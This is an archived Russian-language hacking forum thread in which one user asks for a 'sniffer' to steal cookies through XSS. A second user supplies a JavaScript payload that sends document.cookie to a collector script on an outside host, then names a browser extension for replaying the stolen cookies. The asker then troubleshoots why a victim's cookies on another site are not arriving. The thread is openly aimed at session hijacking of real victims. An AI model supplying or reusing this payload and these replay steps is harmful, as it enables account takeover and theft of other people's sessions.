PDA

Просмотр полной версии : Подскажите сниффер


amanow
21.05.2021, 06:45
Здравствуйте уважаемые форумчане может есть у кого нибудь снифер для кражи куки через хсс поделитесь пж заранее спасибо

winstrool
21.05.2021, 11:32
PHP:


Отправляем на него:

img = new Image();img.src="https://site.com/sniff.php?cookie="+document.cookie;

amanow
21.05.2021, 13:23
winstrool said:
↑ (https://antichat.live/posts/4460715/)

PHP:


Отправляем на него:
img = new Image();img.src="
https://site.com/sniff.php?cookie=
"+document.cookie;



Большое спасибо получилось ) Скажите пожалуйста куда подставлять полученные куки в opere

winstrool
21.05.2021, 14:05
amanow said:
↑ (https://antichat.live/posts/4460725/)
Большое спасибо получилось ) Скажите пожалуйста куда подставлять полученные куки в opere


Такие простые вопросы можно и за гуглить, если не можете найти ответ потом уже спрашивайте на форуме, или сразу задавайте вопрос в развернутом виде

___addons.opera.com/ru/extensions/details/edit-this-cookie/

amanow
22.05.2021, 08:13
winstrool said:
↑ (https://antichat.live/posts/4460729/)
Такие простые вопросы можно и за гуглить, если не можете найти ответ потом уже спрашивайте на форуме, или сразу задавайте вопрос в развернутом виде
___addons.opera.com/ru/extensions/details/edit-this-cookie/



Я извиняюсь не подскажите есть сайт на котором есть xss когда я пишу alert(document.cookie) он мне показыват мои куки но когда я пишу ваш код и даю жертве ссылку и он по ней переходит его куки мне на хост не приходят почему

amanow
22.05.2021, 14:43
хоть кто нибудь помогите пожалуйста

winstrool
22.05.2021, 15:11
Я же выше писал:


img = new Image();img.src="
https://site.com/sniff.php?cookie=
"+document.cookie;


Ну а дальше по ситуации, смотря какие обстоятельства...

amanow
22.05.2021, 15:29
я создал на хосте скрипт snif.php поставил ваш код в этот файл проверил скрпит на своем сайте где тоже есть xss куки пришли НО когда я даю жертве на другом сайте ссылку на уязвимую страницу куки не приходят ) подумал может нету тут xss закрыли и просто ради интиреса на форуме того сайта написал alert(document.cookie) сайт показывает мне мои куки